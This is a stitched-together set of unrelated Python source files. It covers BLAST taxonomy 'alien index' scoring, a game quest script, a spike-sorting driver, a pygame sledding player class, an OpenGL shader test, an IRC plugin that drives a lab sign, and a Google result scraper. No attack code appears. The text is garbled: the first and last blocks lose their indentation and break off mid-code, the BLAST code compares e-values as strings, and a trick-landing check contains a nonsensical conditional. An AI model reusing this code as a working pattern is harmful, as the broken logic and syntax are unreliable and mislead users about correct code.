evalue = line.split("\t")[10]
try: # needed to skip reassigning 0 to counts after first instance of qseqid
mainDict[qseqid]["numIngroup"]
except KeyError:
mainDict[qseqid] = {"numIngroup" : float(0)}
mainDict[qseqid].update({"numOutgroup" : float(0)})
# subsection if extensive taxon search needed
if extensiveTaxonSearch == True:
# Start search with genus from BLAST line
staxon = [line.strip("\n").split("\t")[16].split(" ")[0].split(";")[0]]
# Exception to handle Candidatus names because they have a space
if "Candidatus" in staxon:
staxon = [" ".join(line.strip("\n").split("\t")[16].split(" ")[0:2])]
try:
staxon.remove("0")
except:
pass
uniqstaxon = list(filter(None, [y for y in set(staxon)]))
try:
uniqstaxon.remove("0")
except:
pass
ingroupFound = False
outgroupFound = False
ignoregroupFound = False
missingGroup = False
# If an invalid genus name found, try the phylum instead
#if uniqstaxon[0] not in nodesDictNamesList:
#if uniqstaxon[0] == "N/A" or uniqstaxon[0] == "synthetic" or uniqstaxon[0] == "unclassified":
# staxon = [x for x in line.strip("\n").split("\t")[15].split(";") if x != 0]
# try:
# staxon.remove("0")
# except:
# pass
# uniqstaxon = list(filter(None, [y for y in set(staxon)]))
# try:
# uniqstaxon.remove("0")
# except:
# pass
# As long as taxon name is not N/A, try parse taxonomy to find the name to determine if ingroup, outgroup, or ignored
if uniqstaxon[0] != "N/A":
for taxon in uniqstaxon:
# parseTaxonomy expects lists for ingroup, outgroup so have to create them. Should probably be removed and just use strings for this script.
if taxon in nodesDictNamesList:
results = parseTaxonomy(taxon, outgroupList, ingroupList, ignoregroupList)
# results == [queryName, ingroupCount, outgroupCount, missingCount, focalTipsPresent]
sumResults = results[1] + results[2] + results[3] + results[4]
if results[1] == 1:
ingroupFound = True
elif results[2] == 1:
outgroupFound = True
elif results[3] == 1:
ignoregroupFound = True
elif results[4] == 1:
missingGroup = True
else:
staxon2 = [x for x in line.strip("\n").split("\t")[15].split(";") if x != 0]
try:
staxon2.remove("0")
except:
pass
uniqstaxon2 = list(filter(None, [y for y in set(staxon2)]))
try:
uniqstaxon2.remove("0")
except:
pass
for taxon2 in uniqstaxon2:
if taxon2 in nodesDictNamesList:
results2 = parseTaxonomy(taxon2, outgroupList, ingroupList, ignoregroupList)
sumResults = results2[1] + results2[2] + results2[3] + results2[4]
if results2[1] == 1:
ingroupFound = True
elif results2[2] == 1:
outgroupFound = True
elif results2[3] == 1:
ignoregroupFound = True
elif results[4] == 1:
missingGroup = True
if ingroupFound == False and outgroupFound == False: # don't do anything, assuming query falls in gap between ingroup and outgroup or in ignoregroup
pass
elif ingroupFound == True and outgroupFound == False and ignoregroupFound == False or uniqstaxon[0] == "N/A" and missingData == "ingroup":
mainDict[qseqid]["numIngroup"] += 1
try:
previousBBHG = mainDict[qseqid]["bestBlastHitIngroup"].split("\t")[10] # retrieve evalue of best ingroup hit stored in dictionary for qseqid
if evalue > previousBBHG:
mainDict[qseqid]["bestBlastHitIngroup"] = line
except KeyError: # if no previous entry in dictionary
try:
mainDict[qseqid].update({"bestBlastHitIngroup" : line})
except:
mainDict[qseqid] = {"bestBlastHitIngroup" : line}
elif ingroupFound == False and outgroupFound == True and ignoregroupFound == False or uniqstaxon[0] == "N/A" and missingData == "outgroup":
mainDict[qseqid]["numOutgroup"] += 1
try:
previousBBHO = mainDict[qseqid]["bestBlastHitOutgroup"].split("\t")[10] # retrieve evalue of best outgroup hit stored in dictionary for qseqid
if evalue > previousBBHO:
mainDict[qseqid]["bestBlastHitOutgroup"] = line
except KeyError: # if no previous entry in dictionary
try:
mainDict[qseqid].update({"bestBlastHitOutgroup" : line})
except KeyError:
mainDict[qseqid] = {"bestBlastHitOutgroup" : line}
elif sumResults > 1: # catch errors where both multiple groups are found in the same BLAST line
print("WARNING: Multiple group names found. Check your groups are mutually exclusive in NCBI taxonomy. Offending taxon list: %s" % uniqstaxon , file=sys.stderr)
# subsection if only standard taxon searching needed
else:
# set 'staxon' as the element to compare to ingroup name if --taxon is set
if 'taxonRank' in locals():
if taxonRank == "superkingdom":
staxon = [x for x in line.strip("\n").split("\t")[13].split(";") if x != 0]
elif taxonRank == "kingdom":
staxon = [x for x in line.strip("\n").split("\t")[14].split(";") if x != 0]
elif taxonRank == "phylum":
staxon = [x for x in line.strip("\n").split("\t")[15].split(";") if x != 0]
elif taxonRank == "genus":
staxon = [line.strip("\n").split("\t")[16].split(" ")[0].split(";")[0]]
try:
staxon.remove("0")
except:
pass
# set 'staxon' to all taxonomy fields if not specified in command line
else:
staxon = []
for x in line.strip("\n").split("\t")[13:16]:
try:
templist = [y for y in x.split(";") if y != 0]
for z in templist:
staxon.append(z)
except:
staxon.append(x)
staxon.append(line.strip("\n").split("\t")[16].split(" ")[0].split(";")[0])
uniqstaxon = list(filter(None, [y for y in set(staxon)]))
try:
uniqstaxon.remove("0")
except:
pass
# Compare evalue from current line to previous dictionary entry for ingroup/outgroup, replace with line if previous evalue lower than current
if ingroup.lower() in [j.lower() for j in staxon] and len(set(staxon)&set(ignoregroupList)) == 0 or uniqstaxon[0] == "N/A" and missingData == "ingroup":
mainDict[qseqid]["numIngroup"] += 1
try:
previousBBHG = mainDict[qseqid]["bestBlastHitIngroup"].split("\t")[10] # retrieve evalue of best ingroup hit stored in dictionary for qseqid
if evalue > previousBBHG:
mainDict[qseqid]["bestBlastHitIngroup"] = line
except KeyError: # if no previous entry in dictionary
try:
mainDict[qseqid].update({"bestBlastHitIngroup" : line})
except:
mainDict[qseqid] = {"bestBlastHitIngroup" : line}
elif len(outgroupList) >= 1:
if len(set(staxon)&set(outgroupList)) >= 1 or uniqstaxon[0] == "N/A" and missingData == "outgroup":
mainDict[qseqid]["numOutgroup"] += 1
try:
previousBBHO = mainDict[qseqid]["bestBlastHitOutgroup"].split("\t")[10] # retrieve evalue of best outgroup hit stored in dictionary for qseqid
if evalue > previousBBHO:
mainDict[qseqid]["bestBlastHitOutgroup"] = line
except KeyError: # if no previous entry in dictionary
try:
mainDict[qseqid].update({"bestBlastHitOutgroup" : line})
except KeyError:
mainDict[qseqid] = {"bestBlastHitOutgroup" : line}
else:
continue
elif len(outgroupList) == 0:
if ingroup.lower() not in [j.lower() for j in staxon] or uniqstaxon[0] == "N/A" and missingData == "outgroup":
mainDict[qseqid]["numOutgroup"] += 1
try:
previousBBHO = mainDict[qseqid]["bestBlastHitOutgroup"].split("\t")[10] # retrieve evalue of best outgroup hit stored in dictionary for qseqid
if evalue > previousBBHO:
mainDict[qseqid]["bestBlastHitOutgroup"] = line
except KeyError: # if no previous entry in dictionary
try:
mainDict[qseqid].update({"bestBlastHitOutgroup" : line})
except KeyError:
mainDict[qseqid] = {"bestBlastHitOutgroup" : line}
# Debugging precaution
#else:
# print("This shouldn't happen - error comparing ingroup to staxon")
# print("Ingroup: %s , staxon: %s" %(ingroup, staxon))
# print(line)
# exit(1)
# Calculate AI and write to file or screen.
# AI = ln(best ingroup evalue + pseudocount) - ln(best outgroup evalue +
# pseudocount); the pseudocount 1*10e-200 (== 1e-199) avoids log(0). A query
# with no stored hit for a group defaults that group's evalue to 1.
if 'outfile' in locals():
    with open(outfile, 'w') as openOutfile:
        openOutfile.write("#QueryID\tNumber-Ingroup\tNumber-Outgroup\tPercent-Ingroup\tPercent-Outgroup\tBestBlastHit-Ingroup\tBestBlastHit-Outgroup\tAlienIndex\n")
        for qseqid in mainDict:
            numIngroup = mainDict[qseqid]["numIngroup"]
            numOutgroup = mainDict[qseqid]["numOutgroup"]
            # Guard against division by zero when a query had no classified hits.
            if numIngroup == 0 and numOutgroup == 0:
                percIngroup = 0
                percOutgroup = 0
            else:
                percIngroup = 100 * numIngroup / (numIngroup + numOutgroup)
                percOutgroup = 100 * numOutgroup / (numIngroup + numOutgroup)
            try:
                bbhG = float(mainDict[qseqid]["bestBlastHitIngroup"].split("\t")[10])
                #taxG = mainDict[qseqid]["bestBlastHitIngroup"].split("\t")[13:16]
            except KeyError:
                bbhG = 1
                #taxG = "No hit"
            try:
                bbhO = float(mainDict[qseqid]["bestBlastHitOutgroup"].split("\t")[10])
                #taxO = mainDict[qseqid]["bestBlastHitOutgroup"].split("\t")[13:16]
            except KeyError:
                bbhO = 1
                #taxO = "No hit"
            AI = (np.log(bbhG + (1*10e-200)))-(np.log(bbhO + (1*10e-200)))
            mainDict[qseqid].update({"AI" : AI}) # add AI to main dictionary in case I want to use later
            openOutfile.write("%s\t%d\t%d\t%0.2f\t%0.2f\t%s\t%s\t%0.2f\n" %(qseqid, int(mainDict[qseqid]["numIngroup"]), int(mainDict[qseqid]["numOutgroup"]), percIngroup, percOutgroup, bbhG, bbhO, AI))
else:
    # No outfile requested: print the same table to stdout instead.
    print("#QueryID\tNumber-Ingroup\tNumber-Outgroup\tPercent-Ingroup\tPercent-Outgroup\tBestBlastHit-Ingroup\tBestBlastHit-Outgroup\tAlienIndex")
    for qseqid in mainDict:
        numIngroup = mainDict[qseqid]["numIngroup"]
        numOutgroup = mainDict[qseqid]["numOutgroup"]
        if numIngroup == 0 and numOutgroup == 0:
            percIngroup = 0
            percOutgroup = 0
        else:
            percIngroup = 100 * numIngroup / (numIngroup + numOutgroup)
            percOutgroup = 100 * numOutgroup / (numIngroup + numOutgroup)
        try:
            bbhG = float(mainDict[qseqid]["bestBlastHitIngroup"].split("\t")[10])
        except KeyError:
            bbhG = 1
        try:
            bbhO = float(mainDict[qseqid]["bestBlastHitOutgroup"].split("\t")[10])
        except KeyError:
            bbhO = 1
        AI = (np.log(bbhG + (1*10e-200)))-(np.log(bbhO + (1*10e-200)))
        mainDict[qseqid].update({"AI" : AI}) # add AI to main dictionary in case I want to use later
        # NOTE(review): bare except silently drops a row that fails to format.
        try:
            print("%s\t%d\t%d\t%0.2f\t%0.2f\t%s\t%s\t%0.2f" %(qseqid, int(mainDict[qseqid]["numIngroup"]), int(mainDict[qseqid]["numOutgroup"]), percIngroup, percOutgroup, bbhG, bbhO, AI))
        except:
            pass
# Close the log file only if logging was enabled earlier in the script.
if 'logfileName' in locals():
    logfile.close()
|
#23212 | Contract with Mastema
# If the player accepts the ritual, set job 3110, grant 5 SP, complete the
# parent quest, and play the contract dialogue. The script is disposed on
# both the accept and decline paths.
sm.setSpeakerID(2450017)
accepted = sm.sendAskYesNo("Everything is ready. Let us begin the contract ritual. Focus on your mind.")
if accepted:
    sm.setJob(3110)
    sm.addSP(5)
    sm.completeQuest(parentID)
    sm.setPlayerAsSpeaker()
    sm.sendNext("#b(You feel a curious energy flowing into you.)")
    sm.setSpeakerID(2450017)
    sm.sendNext("There... our contract is made. Now we can communicate through our minds. Isn't that neat?")
sm.dispose()
|
# Example driver for the yass pipeline: load a config, run the preprocessor,
# then feed its outputs to the processor (spike-sorting, judging by the
# output names -- confirm against the yass docs).
import logging
import yass
from yass import preprocess
from yass import process
# configure logging module to get useful information
logging.basicConfig(level=logging.DEBUG)
# set yass configuration parameters
yass.set_config('config_sample.yaml')
# run preprocessor
score, clr_idx, spt = preprocess.run()
# run processor
(spike_train_clear, templates,
 spike_index_collision) = process.run(score, clr_idx, spt)
|
import pygame
import load
from locals import *
from physics import *
from entity import Entity
from ice import Ice
from rock import Rock
from score import Score
from math import sin, cos, pi
def init():
    """Load the shared "sledder" sprite into the Player class attribute."""
    Player.image = load.load_image("sledder")
def drawMessage(screen):
    """Blit the active event messages (rock smash, rock jump, trick) near the
    lower-right corner of *screen*, stacking upward when several flags in
    Player.msgBools are set at once.
    """
    messages = ["SMASHED INTO ROCK!", "JUMPED OVER ROCK!", "SUCCESSFUL TRICK!"]
    font = load.load_font("FuturaT_Bold", 20)
    msgNum = 0
    # msgBools and messages are parallel: flag i selects message i.
    for active, text in zip(Player.msgBools, messages):
        if active:
            msgNum += 1  # stack each additional message 35px higher
            msg = font.render(text, True, (127, 178, 215))
            screen.blit(msg, (SCREEN_WIDTH - 250,
                              SCREEN_HEIGHT - 50 - msgNum * 35))
class Player(Entity):
    """The sled-riding player entity.

    Handles movement along tiled slope platforms (each ``pWidth`` pixels
    wide), jumping, mid-air rotation tricks, and collisions with ice patches
    and rocks. ``update`` returns the current ground speed so callers can
    scroll the world.
    """
    image = None          # shared sprite, loaded lazily by init()
    grav = 1.1            # per-frame gravity applied while airborne
    acc = 0.5             # slope acceleration factor
    iceAcc = 0.2          # extra acceleration while on ice
    trickAcc = 1          # speed bonus for a landed trick
    msgBools = [False, False, False] # rockSmash, rockJump, didTrick
    pWidth = 1024         # width of one platform tile in pixels
    cameraY = 300         # vertical camera offset used in slope math
    def __init__(self):
        super().__init__()
        if not Player.image:
            # BUGFIX: was 'player.init()' (NameError) -- the loader is the
            # module-level function init().
            init()
        self.image = Player.image
        self.image.convert_alpha()
        self.dx, self.dy = 0, 9
        self.angle = 0
        self.onGround = False
        self.hitmask = pygame.surfarray.array_alpha(self.image)
        self.mask = pygame.mask.from_surface(self.image)
        self.rect = self.image.get_rect()
        self.width = self.image.get_width()
        self.height = self.image.get_height()
        self.doingTrick = self.rotating = False
        self.crashed = self.tooSteep = self.willCrash = False
        self.up = False
        self.falling = True
        self.groundSpeed = 12
        self.message = None
        self.score = 5 # score multiplier
        self.blitCount = 0
    def update(self, platforms, ice=None, rock=None):
        """Advance the player one frame and return the current ground speed."""
        if self.groundSpeed >= 18: # function for calibrating speed
            dec = 0.013 * self.groundSpeed - .22
            self.groundSpeed -= dec
        # Count frames while any HUD message flag is active.
        if Player.msgBools[0] or Player.msgBools[1] or Player.msgBools[2]:
            self.blitCount += 1
        else:
            self.blitCount = None
        if self.onGround:
            if self.willCrash:
                self.tooSteep = True
            self.falling = False
            if 0 < self.angle % 360 < 90: # going uphill
                self.groundSpeed -= (Player.acc *
                                     abs(sin(radians(self.angle))))
            else:
                if self.groundSpeed <= 25:
                    self.groundSpeed += (Player.acc *
                                         abs(sin(radians(self.angle))))
            self.dx = self.groundSpeed * cos(radians(self.angle))
            self.dy = self.groundSpeed * -sin(radians(self.angle))
        if self.rotating:
            self.updateAngle(self.angle + 20)
        if not self.onGround:
            self.dy += Player.grav
        self.makeLegalXMove(self.dx,
                            platforms[self.rect.right // Player.pWidth], platforms)
        self.collide(self.dx, 0, platforms)
        if self.up and not self.falling:
            self.dy = (-12)
            self.falling = True
        self.makeLegalYMove(self.dy,
                            platforms[self.rect.right // Player.pWidth], platforms)
        self.collide(0, self.dy, platforms)
        self.icerockCollision(platforms, ice, rock)
        # Clear all message flags after 20 frames on screen.
        if self.blitCount == 20:
            Player.msgBools[0] = Player.msgBools[
                1] = Player.msgBools[2] = False
        if self.onGround and (240 < self.angle % 360 < 300
                              or 90 < self.angle % 360 < 180):
            self.tooSteep = True
        return self.groundSpeed
    def makeLegalXMove(self, move, platform, platforms, depth=0):
        # makes a legal move in the x direction depending on player's position
        # relative to the slope
        p = platform
        x = self.rect.left
        x += move # make the move
        result = self.isLegalX(x, p, platforms)
        if result == True:
            # make the move to the player rect
            self.rect.left += move
        else:
            # offset by how much the player would overlap and make the move
            target1 = result
            self.rect.left, self.rect.top = \
                self.rect.left + move, self.rect.top - target1
    def isLegalX(self, x, p, platforms):
        '''calculates if move is legal; if not, returns how much the player
        overlaps a legal move is defined as the player's bottom being at the
        height of the platform'''
        x0 = int(x % Player.pWidth) # left most point
        x1 = (int((x0 + self.width * (sin(radians(self.angle)))
                   + self.width * (cos(radians(self.angle)))) % Player.pWidth))
        platformY0 = \
            (platforms[self.rect.right // Player.pWidth].outlineList[x0][1])
        # corresponding platform height
        if self.rect.right % Player.pWidth <= Player.pWidth - self.width:
            platformY1 = \
                platforms[self.rect.right // Player.pWidth].outlineList[x1][1]
        else:
            # use next platform
            platformY1 = \
                platforms[self.rect.right //
                          Player.pWidth + 1].outlineList[x1][1]
        bottom0 = (self.rect.top - Player.cameraY
                   + self.width * (sin(radians(self.angle)))
                   + self.width * (cos(radians(self.angle))))
        bottom1 = (self.rect.top - Player.cameraY
                   + self.width * cos(radians(self.angle)))
        if platformY1 >= bottom1 and platformY0 >= bottom0:
            # should always be above slope curve
            return True
        else:
            targetAngle = getAngle((platformY1 - platformY0), self.rect.width)
            if not self.doingTrick:
                self.updateAngle(targetAngle)
            target1 = bottom1 - platformY1
            return target1
    def makeLegalYMove(self, move, platform, platforms, depth=0):
        """Apply a vertical move, clamping it so the player stays on the slope."""
        p = platform
        y = self.rect.top
        y += move # make the move
        result = self.isLegalY(y, p, platforms)
        if result[0]:
            self.rect.top += move
            return
        else:
            target1 = result[2]
            self.rect.top += math.floor(move - abs(target1)) # correction
    def isLegalY(self, y, p, platforms):
        """Return (legal, overlap0, overlap1) for a vertical position *y*."""
        x0 = self.rect.left % Player.pWidth # left most point
        x1 = self.rect.right % Player.pWidth # right most point
        currPlat = self.rect.right // Player.pWidth
        platformY0 = platforms[currPlat].outlineList[x0][1]
        platformY1 = platforms[currPlat].outlineList[x1][1]
        top = y
        bottom0 = (top - Player.cameraY
                   + self.width * (sin(radians(self.angle)))
                   + self.width * (cos(radians(self.angle))))
        bottom1 = (top - Player.cameraY + self.width *
                   cos(radians(self.angle)))
        if platformY1 >= bottom1: # should always be above slope curve
            return (True, None, None)
        else:
            prevAngle = self.angle % 360
            targetAngle = getAngle(
                (platformY1 - platformY0), self.rect.width) % 360
            # A landing more than 30 degrees off the slope angle will crash.
            if (abs(self.angle - targetAngle) <= 30 or
                    abs(self.angle + 360 - targetAngle) <= 30 or
                    abs(self.angle - targetAngle - 360) <= 30):
                pass
            else:
                if not self.doingTrick:
                    print("Too steep", prevAngle, targetAngle)
                    self.willCrash = True
            if not self.doingTrick:
                self.updateAngle(targetAngle)
            target0 = bottom0 - platformY0
            target1 = bottom1 - platformY1
            return (False, target0, target1)
    def updateAngle(self, angle):
        # updates player angle and rotates original image based on the angle
        self.angle = angle
        self.image = pygame.transform.rotate(Player.image, angle)
        self.rect.width = self.image.get_width()
        self.rect.height = self.image.get_height()
        self.hitmask = pygame.surfarray.array_alpha(self.image)
    def isUphill(self, p):
        """Return True when platform *p* rises under the player."""
        x0, x1 = self.rect.left % Player.pWidth, \
            self.rect.right % Player.pWidth
        y0, y1 = p.outlineList[x0][1], p.outlineList[x1][1]
        return (y1 < y0)
    def collide(self, dx, dy, platforms):
        """Resolve a pixel-perfect collision with the current platform:
        land the player, score or crash a pending trick, and align the
        sprite to the slope angle.
        """
        p = platforms[self.rect.right // Player.pWidth]
        if pixelPerfectCollision(self, p) != None:
            # collision occurred
            self.onGround = True
            self.dy = 0
            if self.isUphill(p):
                y0, y1 = self.calculateUphill(p)
            else:
                y0, y1 = self.calculateDownhill(p)
            yOverlap = pixelPerfectCollision(self, p)[0]
            xOverlap = pixelPerfectCollision(self, p)[1]
            third = pixelPerfectCollision(self, p)[2]
            targetAngle = getAngle((y1 - y0), self.rect.width)
            if self.doingTrick:
                if self.angle > 360:
                    calcAngle = self.angle % 360
                else:
                    calcAngle = self.angle
                if (abs(targetAngle - calcAngle) <= 25 or
                        abs(targetAngle + 360 - calcAngle) <= 25 or
                        abs(targetAngle - calcAngle - 25) <= 25 if False else
                        abs(targetAngle - calcAngle - 360) <= 25):
                    # allows for some inaccuracy, takes edge cases into account
                    self.blitCount = 0
                    Player.msgBools[2] = True
                    # successful trick!
                    scoreMultiple = self.angle // 360 + 0.5
                    self.score += int(3 * scoreMultiple)
                    self.groundSpeed += Player.trickAcc # speed up
                    self.doingTrick = False
                else: # crashed
                    print("Aiming for", targetAngle, "but", calcAngle)
                    self.crashed = True
            if not self.doingTrick:
                self.updateAngle(targetAngle)
        else:
            self.onGround = False
    def calculateUphill(self, p):
        # returns slope height at player's position going uphill
        x0, x1 = self.rect.left % Player.pWidth, \
            self.rect.right % Player.pWidth
        y0, y1 = p.outlineList[x0][1], p.outlineList[x1][1]
        return (y0, y1)
    def calculateDownhill(self, p):
        # returns slope height at player's position going downhill
        a = self.angle
        x0 = (int(self.rect.right % Player.pWidth
                  - (self.width * sin(a * pi / 180)) - self.width) % Player.pWidth)
        x1 = (int(self.rect.right % Player.pWidth
                  - (self.width * sin(a * pi / 180))) % Player.pWidth)
        y0, y1 = p.outlineList[x0][1], p.outlineList[x1][1]
        return (y0, y1)
    def icerockCollision(self, platforms, ice, rock):
        """Apply ice speed-up and resolve collisions/jumps against rocks."""
        self.currPlat = platforms[self.rect.right // Player.pWidth]
        if (ice[self.currPlat][0][0] <= (self.rect.centerx % Player.pWidth)
                <= ice[self.currPlat][-1][0]):
            if not self.falling:
                # speed increases when colliding with ice
                self.groundSpeed += Player.iceAcc
        # rock pixel collision
        for r in rock:
            leftRockEdge = r.rect.x
            if pixelPerfectCollision(self, r) != None:
                if self.groundSpeed < 20: # different from scarf
                    self.crashed = True
                else: # can smash into rocks at speeds greater than 20
                    self.blitCount = 0
                    Player.msgBools[0] = True
                    n = 0
                    while n < 3:
                        r.explode(n)
                        n += 1
            elif (0 <= self.rect.right % Player.pWidth - leftRockEdge <= 20
                    and self.falling):
                # jumped over rock
                self.blitCount = 0
                Player.msgBools[1] = True
    def getScore(self):
        """Return the current score multiplier."""
        return self.score
    def moveUp(self, bool):
        """Set the jump-intent flag (NOTE: parameter shadows builtin 'bool')."""
        if bool:
            self.up = True
        else:
            self.up = False
    def rotate(self, bool):
        """Start/stop a rotation trick; only allowed while falling."""
        if bool and self.falling:
            self.rotating = True
            self.doingTrick = True
        else:
            self.rotating = False
|
"""The geometry shader should populate the feedback buffer with
vertex indices. However, it only does this if both EmitVertex calls
are commented out."""
NUM_NODES = 6
import numpy as np
from OpenGL.GL import *
from PyQt4 import QtCore, QtGui, QtOpenGL
VS = """#version 440
in vec4 position;
out VSOUT
{
vec4 gl_Position;
int index;
} vsout;
uniform mat4 gl_ModelViewMatrix;
void main()
{
gl_Position = gl_ModelViewMatrix * position;
vsout.index = gl_VertexID;
vsout.gl_Position = gl_Position;
}
"""
GS = """#version 440
#extension GL_ARB_shader_storage_buffer_object : enable
layout (lines) in;
layout (line_strip) out;
in VSOUT{
vec4 gl_Position;
int index;
} vdata[];
layout (std430, binding=0) buffer FeedbackBuffer{
vec2 fb[];
};
void main()
{
int i = vdata[0].index;
int j = vdata[1].index;
fb[gl_PrimitiveIDIn ][0] = vdata[0].index;
fb[gl_PrimitiveIDIn ][1] = vdata[1].index;
gl_Position = gl_in[0].gl_Position;
EmitVertex();
gl_Position = gl_in[1].gl_Position;
EmitVertex();
}
"""
FS = """#version 440
out vec4 outputColor;
void main()
{
outputColor = vec4(.5,.5,.5,.5);
}
"""
class GeomTestWidget(QtOpenGL.QGLWidget):
    """Minimal QGLWidget reproducing the SSBO-feedback issue described in the
    module docstring. Press Space to dump the feedback buffer contents.
    (Python 2 / PyQt4 code.)
    """
    def initializeGL(self):
        # Compile and link the three shader stages, then create the SSBO
        # (bound at index 0) that the geometry shader writes indices into.
        glViewport(0, 0, self.width(), self.height())
        glEnable(GL_PROGRAM_POINT_SIZE)
        glEnable(GL_POINT_SMOOTH)
        self.shaderProgram = QtOpenGL.QGLShaderProgram(self)
        self.shaderProgram.addShaderFromSourceCode(QtOpenGL.QGLShader.Vertex, VS)
        self.shaderProgram.addShaderFromSourceCode(QtOpenGL.QGLShader.Geometry, GS)
        self.shaderProgram.addShaderFromSourceCode(QtOpenGL.QGLShader.Fragment, FS)
        self.shaderProgram.link()
        # Column-major modelview matrix translating by (-0.5, -0.5).
        self.pr_matrix = [1., 0., 0., -.0 ,
                          0., 1., 0., -.0,
                          0., 0., 1., 0.,
                          -.5, -.5, 0., 1.]
        # random points and edges
        self.positions = np.random.random((NUM_NODES, 2))
        self.fbBuffer = glGenBuffers(1)
        glBindBuffer(GL_SHADER_STORAGE_BUFFER, self.fbBuffer)
        self.fb = np.zeros((NUM_NODES,2), dtype=np.float32)
        glBufferData(GL_SHADER_STORAGE_BUFFER, self.fb.nbytes, self.fb, GL_DYNAMIC_COPY)
        glBindBufferBase(GL_SHADER_STORAGE_BUFFER, 0, self.fbBuffer)
        glMemoryBarrier(GL_SHADER_STORAGE_BARRIER_BIT)
    def keyPressEvent(self, event):
        # Space dumps the feedback buffer; anything else is passed on.
        key = event.key()
        handled = True
        if key in (QtCore.Qt.Key_Space,):
            self.getfb()
        else:
            handled = False
        if handled:
            self.updateGL()
        else:
            event.ignore()
    def getfb(self, init=False):
        # Read the SSBO back into self.fb and print it.
        glBindBuffer(GL_SHADER_STORAGE_BUFFER, self.fbBuffer)
        glMemoryBarrier(GL_SHADER_STORAGE_BARRIER_BIT)
        glGetBufferSubData(GL_SHADER_STORAGE_BUFFER, 0, self.fb.nbytes, self.fb)
        print self.fb
    def paintGL(self):
        # Draw the test edges; the geometry shader should fill the SSBO as a
        # side effect of this draw call.
        glClearColor(0., 0., 0., 1.)
        glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
        glMatrixMode(GL_MODELVIEW)
        glLoadMatrixf(self.pr_matrix)
        self.shaderProgram.bind()
        self.shaderProgram.setAttributeArray("position", self.positions)
        self.shaderProgram.setUniformValue("NUM_NODES", NUM_NODES)
        self.shaderProgram.enableAttributeArray("position")
        # draw nodes
        #glDrawArrays(GL_POINTS, 0, NUM_NODES)
        # draw edges
        edges = [0,1,0,2,2,3,2,4]
        glDrawElements(GL_LINES, len(edges), GL_UNSIGNED_INT, edges)
        self.shaderProgram.release()
    def resizeGL(self, width, height):
        glViewport(0, 0, self.width(), self.height())
def main():
    """Create the Qt application, request a core-profile GL format, and show
    the test widget until the app exits."""
    import sys
    app = QtGui.QApplication(sys.argv)
    fmt = QtOpenGL.QGLFormat()
    fmt.setProfile(QtOpenGL.QGLFormat.CoreProfile)
    widget = GeomTestWidget(fmt)
    widget.resize(640, 480)
    widget.show()
    sys.exit(app.exec_())
if __name__ == '__main__':
    main()
###
# Copyright (c) 2009, paulv
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import supybot.utils as utils
from supybot.commands import *
import supybot.plugins as plugins
import supybot.ircutils as ircutils
import supybot.callbacks as callbacks
import supybot.ircdb as ircdb
import urllib
class HacklabSign(callbacks.Plugin):
    """ Provides access to the sign in the lab
    """
    threaded = True
    def sign(self, irc, msg, args, text):
        """<message>
        echos <message> to the sign
        """
        # Prefix the message with the requesting nick, then hand it to the
        # sign's HTTP SignService via a GET request.
        message = format ("%s:\n%s", msg.nick, text)
        urlbase = "http://192.168.111.4:8080/SignService?"
        urlargs = urllib.urlencode({ "Action" : "ShowMessage", "FontSize" : 10, "Version" : "2009-02-03", "Message" : message })
        url = format("%s%s", urlbase, urlargs)
        handle = utils.web.getUrl(url)  # fire the request; response body is unused
        irc.noReply()
    sign = wrap(sign, ["text"])  # supybot argument spec: one free-form <text> argument
# Plugin class exported to supybot's loader.
Class = HacklabSign
# vim:set shiftwidth=4 tabstop=4 expandtab textwidth=79:
|
# -*- coding: utf-8 -*-
from mechanize import Browser
from bs4 import BeautifulSoup
import timeit
import unicodedata
import encodings
import os,sys
busc=raw_input('QUE DESEAS BUSCAR?'+'\n')
inicio1=timeit.default_timer()
print 'BUSCANDO EN GOOGLE ........'+'\n'
if busc=='pythan':
obag='.python'
else:
obag=busc
if busc=='pythen':
obag='.python'
if busc=='pythin':
obag='.python'
if busc=='python':
obag='.python'
if busc=='pythun':
obag='.python'
# Submit the query to Google through mechanize, pretending to be Chrome
# (robots.txt handling disabled so the search form is reachable).
br = Browser()
br.set_handle_robots( False )
br.addheaders = [('User-agent', 'Chrome')]
br.open( "http://google.com" )
br.select_form( 'f' )
br.form[ 'q' ] = obag
br.submit()
# '+'-encode spaces in the query for later URL building.
b = obag.replace(' ', '+')
# Collect every href on the results page, one per line.
soup = BeautifulSoup(br.response().read())
principal = ''.join(str(link.get('href')) + '\n' for link in soup.find_all('a'))
# Number of href lines collected from the results page.
duno = principal.count('\n')

def _extract_line(text, index):
    """Return the newline-separated entry of *text* at position *index*.

    Replaces ten copy-pasted scanning loops: characters are accumulated once
    *index* newlines have been seen, stopping at the next newline.
    """
    out = ''
    seen = 0
    for ch in text:
        if ch == '\n':
            seen += 1
        if seen == index and ch != '\n':
            out += ch
        if seen > index:
            break
    return out

# Offsets into the href list: entry 18 plus the entries 18..10 lines from the
# end. (These offsets appear tuned to Google's result-page markup -- confirm.)
googlelink1 = _extract_line(principal, 18)
googlelink2 = _extract_line(principal, duno - 18)
googlelink3 = _extract_line(principal, duno - 17)
googlelink4 = _extract_line(principal, duno - 16)
